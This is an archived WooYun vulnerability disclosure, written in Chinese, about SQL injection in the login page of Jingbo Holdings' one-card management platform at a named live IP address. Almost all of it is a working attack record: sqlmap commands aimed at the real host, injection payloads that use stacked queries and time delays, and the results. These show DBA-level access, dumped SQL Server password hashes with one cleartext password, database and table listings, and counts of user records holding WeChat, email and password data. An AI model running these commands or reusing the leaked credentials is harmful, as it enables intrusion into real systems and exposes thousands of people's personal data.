乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-06: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-21: 厂商已经主动忽略漏洞,细节向公众公开
京博控股一卡通综合管理平台SQL注射漏洞,超过1万名用户的微信,email,用户名,密码等信息泄露(sa权限)
京博控股一卡通综合管理平台登陆页面:
网页地址:http://222.134.52.40:80/admin/sys/login.aspx 使用sqlmap进行测试:
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --current-user --current-db --is-dba --users --passwords --threads=10
得出sa权限:
---Parameter: cLoginName (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __VIEWSTATE=/wEPDwULLTE4MjU0NTM0NjcPFgIeCVJldHVyblVybAUNbWFpbmZyYW1lLmh0bWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2NMb2dpbkltYWdlOZ7lWtbR9HHFDQObbjkZ09Hs9mM=&__EVENTVALIDATION=/wEWBAKupKyGCgLcmtX1BwKS6+/wDAKFr8OlB1TFYJlcUXX/2Jt52Ilt6YjMgE6J&cLoginName=rlug';IF(5456=5456) SELECT 5456 ELSE DROP FUNCTION VJSu--&cPassword=&cLoginImage.x=1&cLoginImage.y=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __VIEWSTATE=/wEPDwULLTE4MjU0NTM0NjcPFgIeCVJldHVyblVybAUNbWFpbmZyYW1lLmh0bWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2NMb2dpbkltYWdlOZ7lWtbR9HHFDQObbjkZ09Hs9mM=&__EVENTVALIDATION=/wEWBAKupKyGCgLcmtX1BwKS6+/wDAKFr8OlB1TFYJlcUXX/2Jt52Ilt6YjMgE6J&cLoginName=rlug';WAITFOR DELAY '0:0:5'--&cPassword=&cLoginImage.x=1&cLoginImage.y=1 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: __VIEWSTATE=/wEPDwULLTE4MjU0NTM0NjcPFgIeCVJldHVyblVybAUNbWFpbmZyYW1lLmh0bWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2NMb2dpbkltYWdlOZ7lWtbR9HHFDQObbjkZ09Hs9mM=&__EVENTVALIDATION=/wEWBAKupKyGCgLcmtX1BwKS6+/wDAKFr8OlB1TFYJlcUXX/2Jt52Ilt6YjMgE6J&cLoginName=rlug' WAITFOR DELAY '0:0:5'--&cPassword=&cLoginImage.x=1&cLoginImage.y=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'current database: 'yktdb_jingbo'current user is DBA: Truedatabase management system users [6]:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] cl[*] jbgx[*] lzh[*] sa[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x0100a7d480f52f8a378ea2b2cb4274340f3eb98e36646c2df89d header: 0x0100 salt: a7d480f5 mixedcase: 2f8a378ea2b2cb4274340f3eb98e36646c2df89d[*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x0100f6a10c3c5ba02c562f69c27c9714a7460e8506d1aba463a7 header: 0x0100 salt: f6a10c3c mixedcase: 5ba02c562f69c27c9714a7460e8506d1aba463a7[*] cl [1]: password hash: 0x010054754196bd0b45c4340efc010e736d39aa6e72024a943154 header: 0x0100 salt: 54754196 mixedcase: bd0b45c4340efc010e736d39aa6e72024a943154 clear-text password: cl[*] jbgx [1]: password hash: 0x01000af11c231ed0e817e5906bcd6b5dd48848bab4131e0b6616 header: 0x0100 salt: 0af11c23 mixedcase: 1ed0e817e5906bcd6b5dd48848bab4131e0b6616[*] lzh [1]: password hash: 0x01000558b1cee854d4469ef1d862d0ce49fd2a804d5941de56ea header: 0x0100 salt: 0558b1ce mixedcase: e854d4469ef1d862d0ce49fd2a804d5941de56ea[*] sa [1]: password hash: 0x0100025441e9b0a734898b9787f562335e24f2fa129edbcc7f30 header: 0x0100 salt: 025441e9 mixedcase: b0a734898b9787f562335e24f2fa129edbcc7f30
继续测试:
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --dbs
结果:
available databases [9]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] scm_main[*] tempdb[*] yktdb_jingbo[*] ZYTK35
选择yktdb_jingbo进行测试:
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent -D yktdb_jingbo --tables --threads=10
Database: yktdb_jingbo[121 tables]+---------------------------+| EMPInfo || KQ_DevInfo || KQ_MonthlyReport || KQ_MonthlyReport_His || KQ_NoPerson || KQ_QJState || KQ_QJTypeLiuCheng || KQ_RECORD150513 || KQ_Record || KQ_Record0513bak || KQ_Record_His || KQ_State || KQ_Sys_BC || KQ_UserXJ || KQ_User_QJ || KQ_User_QJLCRecord || KqPdMonth_log || Middle_DptChange || Middle_DropEmply || Middle_Emply || Middle_EmplyChange || Middle_KQ_MonthlyReport || Middle_NewEmply || Notice || PersonLog || TR_SB_Record || TR_VW_EmpPhoto || TR_VW_GetAccStatus || TR_VW_KqRecord || TR_VW_PaymentBooks || TR_VW_PaymentBooksALL || TR_VW_PaymentBooks_his || TSYS_COMPANY || TSYS_DEPART || TSYS_Dic || TSYS_MODULE || TSYS_MODULEPOPEDOM || TSYS_POPEDOM || TSYS_PointLogin || TSYS_ROLE || TSYS_ROLEPOPEDOM || TSYS_SYSTEMLOG || TSYS_USER || TSYS_USERPOPEDOM || Temp_DKRecord || Temp_KQRecord || Tr_position || User_QX || View_EmplyPhoto || View_KQYearReport || View_MonthlyRecordT || View_MonthlyRecordT_his || View_QJSPLC || View_QJSPStep || View_QJType || View_Record || View_RecordBC || View_RecordJB || View_RecordT || View_RecordT_His || View_Station || View_UserBaseInfo || View_UserQJ || View_st || XF_DevInfo || ac_dict_AccDep || ac_dict_Accounts || dtproperties || erp_dptandperson || id_accountdepbak || id_accountsinfobak || kq_Code || kq_Define || kq_HolidayType || kq_Serial || kq_dkrecord || kq_hbsq || kq_holiday || kq_qj || kq_serialbak || kq_tbsq || kq_tbsq_new || kq_tbsqlc || kq_userqjlc || kq_weekday || kq_ycsq || mt_baseinfo || mt_dev || mt_dkrecord || mt_kqdev || mt_person || notice_viewer || pb_Duty || pb_EmployeeType || pb_EmplyOther || pb_depart || pb_emply || sysdiagrams || temp1 || temp_correct || temp_log || temp_userinfo || tempmj || tempmonth || tempqj || tmpkqjl || tmpkqjlsl || tr_vw_GetDKInfo || tr_vw_GetKqDevInfo || tr_vw_GetKqDevInfoByMonth || tr_vw_GetXfDevInfo || tr_vw_MonAccounts || user_dqj || user_duty || user_dyb || user_gsremark || view_qjtj || weixin || weixin_bf |+---------------------------+
看到微信了,果断扫一下~~
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T weixin --column
Database: yktdb_jingboTable: weixin[4 columns]+----------+---------+| Column | Type |+----------+---------+| cardnum | varchar || userid | int || userkey | varchar || username | varchar |+----------+---------+
继续深入
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T weixin -C userid --countDatabase: yktdb_jingbo+------------+---------+| Table | Entries |+------------+---------+| dbo.weixin | 11426 |+------------+---------+
尝试其他表:
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T TSYS_USER --column
Database: yktdb_jingboTable: TSYS_USER[20 columns]+---------------+----------+| Column | Type |+---------------+----------+| COMPANYID | int || DEFAULTMODULE | int || DEPARTID | int || EID | varchar || EMAIL | varchar || ENDDATE | datetime || ILOCK | char || IONLINE | int || LOGINNAME | varchar || LOGINPASS | varchar || MPHONE | varchar || OPHONE | varchar || QYID | varchar || QYNAME | varchar || ROLEID | int || STARTDATE | datetime || USERCODE | varchar || USERID | int || USERNAME | varchar || USERSIGN | char |+---------------+----------+
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T TSYS_USER -C USERID --countDatabase: yktdb_jingbo+---------------+---------+| Table | Entries |+---------------+---------+| dbo.TSYS_USER | 14325 |+---------------+---------+
啊啊啊,14325!!!我扫不动了……
Database: yktdb_jingbo+------------+---------+| Table | Entries |+------------+---------+| dbo.weixin | 11426 |+------------+---------+Database: yktdb_jingbo+---------------+---------+| Table | Entries |+---------------+---------+| dbo.TSYS_USER | 14325 |+---------------+---------+Database: yktdb_jingboTable: TSYS_USER[20 columns]+---------------+----------+| Column | Type |+---------------+----------+| COMPANYID | int || DEFAULTMODULE | int || DEPARTID | int || EID | varchar || EMAIL | varchar || ENDDATE | datetime || ILOCK | char || IONLINE | int || LOGINNAME | varchar || LOGINPASS | varchar || MPHONE | varchar || OPHONE | varchar || QYID | varchar || QYNAME | varchar || ROLEID | int || STARTDATE | datetime || USERCODE | varchar || USERID | int || USERNAME | varchar || USERSIGN | char |+---------------+----------+
增加过滤。
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)